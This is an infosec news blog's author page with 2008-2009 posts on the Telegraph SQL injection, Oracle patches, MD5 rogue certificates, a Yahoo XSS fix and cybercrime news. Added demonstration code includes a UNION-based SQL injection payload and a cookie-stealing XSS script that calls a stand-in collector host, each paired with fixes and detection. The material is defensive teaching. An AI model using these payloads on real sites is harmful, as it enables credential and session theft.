
Viewing Profile: Tahir


Latest Posts by Tahir

  • The Daily Telegraph website hacked
    By Tahir on March 7, 2009 | No Comments

    The Romanian group HackersBlog has struck again, and this time the target is not an infosec firm. It is the website of the highest-selling national daily newspaper in the United Kingdom, The Daily Telegraph.

    The Property section of the website suffered a serious SQL injection vulnerability which was disclosed by the group. The affected section of the website is currently offline:


    Figure 1: Telegraph.co.uk's Properties section was taken offline after the compromise

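    What a SQL injection bug like the one disclosed above looks like in code, as an added example that is not part of the original post and not the Telegraph's own code (its schema and application are unknown). The schema, the data and the search handler are constructed for the demonstration: the vulnerable version concatenates the user's search term into the query, the fixed version binds it as a parameter, and the single-quote probe is the classic first test an attacker or a tester sends.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: a property listing plus a user table to steal from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE properties (id INTEGER PRIMARY KEY, town TEXT, price INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT);
        INSERT INTO properties VALUES (1, 'Bath', 450000), (2, 'York', 320000);
        INSERT INTO users VALUES (1, 'alice@example.com', 'hash-a'),
                                 (2, 'bob@example.com', 'hash-b');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, town: str) -> list:
    """Hypothetical search handler: the user's input is spliced straight into SQL."""
    sql = "SELECT town, price FROM properties WHERE town = '" + town + "'"
    return conn.execute(sql).fetchall()


def search_fixed(conn: sqlite3.Connection, town: str) -> list:
    """Same query with a bound parameter: the input is data, never parsed as SQL."""
    sql = "SELECT town, price FROM properties WHERE town = ?"
    return conn.execute(sql, (town,)).fetchall()


# A UNION-based payload: closes the string literal, appends a second SELECT that
# reads a different table, and comments out the original closing quote.
UNION_PAYLOAD = "x' UNION SELECT email, pw_hash FROM users -- "


def single_quote_probe(search) -> bool:
    """Return True if a lone quote makes the query fail, i.e. input reaches the parser.

    `search` is a callable taking the search term; a database error on "'" is the
    tell-tale sign that string concatenation is in use.
    """
    try:
        search("'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_db()
    print("legit   :", search_vulnerable(db, "Bath"))
    print("injected:", search_vulnerable(db, UNION_PAYLOAD))   # leaks users table
    print("fixed   :", search_fixed(db, UNION_PAYLOAD))        # no rows
    print("probe vulnerable:", single_quote_probe(lambda t: search_vulnerable(db, t)))
    print("probe fixed     :", single_quote_probe(lambda t: search_fixed(db, t)))
```

    The placeholder syntax is driver specific (`?` for sqlite3, `%s` for most PostgreSQL and MySQL drivers); what matters is that the value travels separately from the statement text. Escaping quotes by hand is not a substitute, because numeric columns, `LIKE` patterns and multi-byte encodings all open other ways in.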

  • Oracle to issue patch for 41 security issues
    By Tahir on January 12, 2009 | No Comments

    Oracle is to release a patch set tomorrow that fixes 41 security vulnerabilities across its product lines. According to the announcement, the affected supported products are:

    • Oracle Database 11g, version 11.1.0.6
    • Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4
    • Oracle Database 10g, version 10.1.0.5
    • Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV
    • Oracle Secure Backup version 10.2.0.2, 10.2.0.3
    • Oracle Secure Backup version 10.1.0.1, 10.1.0.2, 10.1.0.3
    • Oracle TimesTen In-Memory Database version 7.0.5.1.0, 7.0.5.2.0, 7.0.5.3.0, 7.0.5.4.0
    • Oracle Application Server 10g Release 3 (10.1.3), version 10.1.3.3.0
    • Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.2.0, 10.1.2.3.0
    • Oracle Collaboration Suite 10g, version 10.1.2
    • Oracle E-Business Suite Release 12, version 12.0.6
    • Oracle E-Business Suite Release 11i, version 11.5.10.2
    • Oracle Enterprise Manager Grid Control 10g Release 4, version 10.2.0.4
    • PeopleSoft Enterprise HRMS versions 8.9, 9.0 and 9.1
    • JD Edwards Tools version 8.97
    • Oracle WebLogic Server (formerly BEA WebLogic Server) 10.0 released through MP1, 10.3 GA
    • Oracle WebLogic Server (formerly BEA WebLogic Server) 9.0 GA, 9.1 GA, 9.2 released through MP3
    • Oracle WebLogic Server (formerly BEA WebLogic Server) 8.1 released through SP6
    • Oracle WebLogic Server (formerly BEA WebLogic Server) 7.0 released through SP7
    • Oracle WebLogic Portal (formerly BEA WebLogic Portal) 10.0 released through MP1, 10.2 GA, 10.3 GA
    • Oracle WebLogic Portal (formerly BEA WebLogic Portal) 9.2 released through MP3
    • Oracle WebLogic Portal (formerly BEA WebLogic Portal) 8.1 released through SP6

    This release dwarfs Microsoft’s one-patch fix that affects Windows 2000, Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008.

  • Rogue Certification Authority certificates a reality
    By Tahir on December 31, 2008 | No Comments

    A team of researchers presenting yesterday at the 25th Annual Chaos Communication Congress, held in Berlin, successfully demonstrated an attack against X.509 digital certificates signed by a trusted Certification Authority (CA) using the MD5 hashing algorithm. The attack builds on MD5 chosen-prefix collision techniques, which have been known since 2004 but have now, for the first time, been demonstrated in practice against a real CA's signatures.

    Read more about the details here.

    The discovery, however, does not pose an immediate serious risk, as the specific technique has not been disclosed. Furthermore, most CAs already use at least SHA-1 instead of MD5 for the signature hash. The slow mover, VeriSign, acknowledged the attack today and confirms that the certificates it now issues are not vulnerable to the new attack. Note that the relying party's check is the other way round: what matters to a browser is whether any certificate in the chain it is asked to trust carries an MD5-based signature, not only what a CA issues from today.

    If you are still paranoid, get hold of an Extended Validation Certificate.
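    The check a relying party actually wants is whether a certificate's signature uses MD5, as an added example that is not part of the original post or of the researchers' work. The block below is a deliberately minimal DER walker: it reads the outer `Certificate` SEQUENCE, skips `tbsCertificate`, and decodes the OID in `signatureAlgorithm`. The sample input is a constructed, unsigned, certificate-shaped structure built by `build_sample_cert`, not a real certificate; the OID-to-name table covers only the three RSA signature algorithms relevant here.

```python
def _tlv(tag: int, body: bytes) -> bytes:
    """Encode one DER tag-length-value (short and long length forms)."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def _oid(dotted: str) -> bytes:
    """Encode a dotted OID as a DER OBJECT IDENTIFIER (base-128 arcs)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, body, end_offset) for the TLV starting at buf[pos]."""
    tag = buf[pos]
    first = buf[pos + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + nbytes], "big")
        hdr = 2 + nbytes
    start = pos + hdr
    return tag, buf[start:start + length], start + length


def _decode_oid(body: bytes) -> str:
    arcs = [body[0] // 40, body[0] % 40]
    val = 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:          # high bit clear ends the arc
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


# Well-known PKCS#1 signature algorithm OIDs (the only ones this demo names).
SIG_ALGS = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
}


def signature_algorithm(cert_der: bytes) -> str:
    """Name (or dotted OID) of the outer signatureAlgorithm of a DER certificate."""
    tag, cert_body, _ = _read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    _, _tbs, pos = _read_tlv(cert_body, 0)        # tbsCertificate, skipped
    _, alg_body, _ = _read_tlv(cert_body, pos)    # AlgorithmIdentifier
    tag, oid_body, _ = _read_tlv(alg_body, 0)
    if tag != 0x06:
        raise ValueError("signatureAlgorithm does not start with an OID")
    dotted = _decode_oid(oid_body)
    return SIG_ALGS.get(dotted, dotted)


def uses_md5(cert_der: bytes) -> bool:
    return signature_algorithm(cert_der) == "md5WithRSAEncryption"


def build_sample_cert(alg_oid: str) -> bytes:
    """Constructed certificate-shaped DER for the demo: not a real or signed certificate."""
    tbs = _tlv(0x30, _tlv(0x02, b"\x01"))                    # stand-in tbsCertificate
    alg = _tlv(0x30, _oid(alg_oid) + _tlv(0x05, b""))        # { OID, NULL }
    sig = _tlv(0x03, b"\x00" + b"\x00" * 16)                 # BIT STRING placeholder
    return _tlv(0x30, tbs + alg + sig)


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.4", "1.2.840.113549.1.1.5"):
        der = build_sample_cert(oid)
        print(signature_algorithm(der), "md5:", uses_md5(der))
```

    For a real certificate, feed `signature_algorithm` the bytes from `ssl.PEM_cert_to_DER_cert(pem_text)` and run it over every certificate in the chain, not just the leaf; a rogue intermediate is exactly what the researchers created. Production code should use a proper X.509 library, since this walker does no validation beyond the two tags it inspects.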

    Happy New Year 2009! :-)


  • Microsoft to dump OneCare subscription model
    By Tahir on November 19, 2008 | No Comments

    Microsoft’s Windows Live OneCare service never really received good reviews, despite being one of the first entrants into the retail Windows PC security marketplace with an all-in-one solution. Why not? Many reasons, but primarily because it relies on components that are already available for free and does not work well with third-party programs.

    Things could change for Microsoft with the introduction of “Morro”, a free solution that Microsoft describes as providing “comprehensive protection from malware including viruses, spyware, rootkits and trojans…will be architected for a smaller footprint that will use fewer computing resources, making it ideal for low-bandwidth scenarios or less powerful PCs”. “Morro” will be available in the second half of 2009; the Windows Live OneCare subscription service will be discontinued effective June 30, 2009.

    According to Microsoft’s official press release:

    “Customers around the world have told us that they need comprehensive, ongoing protection from new and existing threats, and we take that concern seriously,” said Amy Barzdukas, senior director of product management for the Online Services and Windows Division at Microsoft. “This new, no-cost offering will give us the ability to protect an even greater number of consumers, especially in markets where the growth of new PC purchases is outpaced only by the growth of malware.”

    It would be interesting to see how Symantec and McAfee respond to this move by Microsoft.

  • Dodgy domain registrar de-accredited by ICANN
    By Tahir on October 30, 2008 | No Comments

    The Internet Corporation for Assigned Names and Numbers (ICANN) has terminated its Registrar Accreditation Agreement (RAA) with EstDomains.com after the President of the company was convicted of credit card fraud, money laundering and document forgery.

    This comes as welcome news to the cyber security community, as EstDomains.com has been used by cybercriminals for years to hide their identities and to register domains for malicious activity such as botnet command and control servers, drive-by downloads and spam.

    Here are some links of interest that provide more information on this story:

    1. F-Secure Weblog - “Case EstDomains” 
    2. The Washington Post Company – “ICANN De-Accredits EstDomains for CEO’s Fraud Convictions”
    3. Notice sent to EstDomains.com by ICANN (pdf)

  • Yahoo! fixes cross-site scripting vulnerability
    By Tahir on October 28, 2008 | No Comments

    Yahoo! has fixed a cross-site scripting vulnerability affecting the HotJobs website. The vulnerability, first reported by Netcraft, allowed injection of script that stole the session authentication cookies of Yahoo! users and submitted them to a US-based web server. Yahoo!’s statement, found on Netcraft, states:

    The team was made aware of this particular Cross-Site Scripting issue yesterday morning (Sunday, Oct. 26) and a fix was deployed within a matter of hours. Yahoo! appreciates Netcraft’s assistance in identifying this issue.

    As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com.

    The session authentication cookies could have been used for accessing Yahoo! services such as Yahoo! Mail and Yahoo! HotJobs amongst others.
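    The cookie-theft mechanism described above, as an added example that is not part of the original post and not Yahoo!'s code (the HotJobs application is unknown): a hypothetical search page that reflects the query unescaped beside the escaped version, the kind of payload that ships `document.cookie` to a collector, the `Set-Cookie` flags that keep a session cookie out of script reach, and a small detection pass over constructed access-log lines. The collector host uses the reserved `.invalid` TLD and the log lines are made up for the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit


def render_results_vulnerable(query: str) -> str:
    """Hypothetical search page that reflects the user's query into HTML unescaped."""
    return f"<h1>Results for {query}</h1>"


def render_results_fixed(query: str) -> str:
    """Same page with entity escaping: '<' -> '&lt;', '\"' -> '&quot;', so no tag is formed."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def script_injected(page: str) -> bool:
    return "<script" in page.lower()


# Cookie-stealing payload of the kind the post describes: the injected script
# fires an image request carrying document.cookie to an attacker-controlled host.
COOKIE_THEFT = ('<script>new Image().src="http://collector.example.invalid/?c="'
                '+encodeURIComponent(document.cookie)</script>')


def session_cookie_header(value: str) -> str:
    """HttpOnly keeps the cookie out of document.cookie; Secure keeps it off plain HTTP."""
    return f"Set-Cookie: SESSION={value}; Path=/; Secure; HttpOnly"


# Constructed Combined-Log-Format lines: one normal search, two reflected-XSS attempts.
ACCESS_LOG = """\
10.0.0.7 - - [26/Oct/2008:09:12:01 +0000] "GET /jobsearch?q=engineer HTTP/1.1" 200 5123
10.0.0.9 - - [26/Oct/2008:09:12:44 +0000] "GET /jobsearch?q=%3Cscript%3Enew%20Image().src%3D%22http://collector.example.invalid/%3Fc%3D%22%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 5311
10.0.0.9 - - [26/Oct/2008:09:13:02 +0000] "GET /jobsearch?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5290
"""

REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
XSS_RE = re.compile(r'<script|<img|onerror\s*=|onload\s*=|javascript:', re.IGNORECASE)


def suspicious_requests(log: str) -> list:
    """Return (client_ip, parameter, decoded_value) for query values that look like XSS."""
    hits = []
    for line in log.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs percent-decodes, so encoded '<script' is matched the same as raw.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if XSS_RE.search(value):
                    hits.append((ip, name, value))
    return hits


if __name__ == "__main__":
    print(render_results_vulnerable(COOKIE_THEFT))   # script executes in the victim's browser
    print(render_results_fixed(COOKIE_THEFT))        # rendered as harmless text
    print(session_cookie_header("abc123"))
    for hit in suspicious_requests(ACCESS_LOG):
        print("XSS attempt from", hit[0], "in", hit[1], ":", hit[2][:60])
```

    Output escaping has to match the context (HTML body here; attribute, URL and JavaScript contexts need their own encoders), and the `HttpOnly` flag limits the damage when escaping is missed somewhere. The log pattern is a coarse triage aid, not a WAF: obfuscated payloads will slip past it, and the authoritative fix is in the rendering code.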

  • US forms task force to combat defense data leaks
    By Tahir on October 28, 2008 | No Comments

    A special task force has been set up by the US Army to combat theft of sensitive military information stored on the computer systems of private-sector contractors. The task force, the Defense Industrial Base Cyber-Security Task Force, came into being earlier this year with little publicity.

    According to an army document produced in August this year for the Pentagon’s Department for Acquisition, Technology and Logistics and first reported last week by Inside Defense:

    “Exfiltrations of unclassified data from [military contractor computer] systems have occurred and continue to occur, potentially undermining and even neutralizing the technological advantage and combat effectiveness of the future force,”

    “Current … efforts largely focus on mitigating risks of compromise to war-fighting technologies as a result of traditional espionage or industrial theft,”

    “hostile actors can exfiltrate large volumes of unclassified program information in a single attack that can potentially net enough information to enable adversaries to narrow a capability gap.”

    Sure, this initiative will bear fruit, but I think more needs to be done within the Government security departments to combat potential cyber security threats. Only this week I saw Airport Security personnel hooked up on MSN.com at Chicago O’Hare International Airport on a light day. Open Internet is a risky area for airport security personnel, don’t you think?

    More on the story here

  • UK defense ministry in possible identity theft scare
    By Tahir on October 10, 2008 | No Comments

    CNN is reporting that the UK Ministry of Defence has lost track of a portable hard drive which, according to a tabloid, carries information on some 100,000 British military personnel and 600,000 potential recruits.

    One can only wonder whether the information on the hard drive was encrypted or not…

  • South Korean missile blueprints stolen?
    By Tahir on October 2, 2008 | No Comments

    South Korea’s major newspaper, The Chosun Ilbo (Korean Daily News), is reporting that two of the country’s top defense equipment manufacturers, LIGNex1 and Hyundai Heavy Industries, found malicious code designed to steal information on their computer systems.

    According to the report:

    LIGNex1 develops and manufactures Hyunmoo surface-to-surface missile, Haeseong ship-to-ship missile and Shingung portable ground-to-air weapons. Hyundai Heavy Industries manufactures Haeseong, the nation’s first Aegis ship, plus destroyers and submarines for the Navy. Although the development costs of such high-tech weapons are kept secret, the construction of the King Sejong the Great-class destroyer is said to cost over W1 trillion (US$1=W1,165) and development of Haeseong ship-to-ship missile W100 billion with each missile at approximately W2 billion.

    The National Security Research Institute, which is affiliated with the Electronics and Telecommunications Research Institute, believes hackers have planted vicious codes through which they stole information. “The research institute suspects the culprits are Chinese or North Korean hackers but doesn’t know specifically what information they stole,” Kim said. “In the worst case, the blueprints of missiles and the Aegis ship could have been stolen.”

  • Biggest hacker underground market going bust; what next?
    By Tahir on September 21, 2008 | 2 Comments

    DarkMarket.ws, the online forum better known as the biggest hacker market for trading stolen online identities, credit card information, ATM skimmers, and a host of other related items – is shutting down Oct 4 according to a notice posted on the forum by one of the forum administrators, Splyntr.

    The shutdown plan follows the arrest of one of its administrators, Cha0 (Cagatay Evyapan), by Turkish police earlier this month.

    The whole story is covered in great detail on Wired’s Threat Level blog. So, what’s next after DarkMarket.ws?

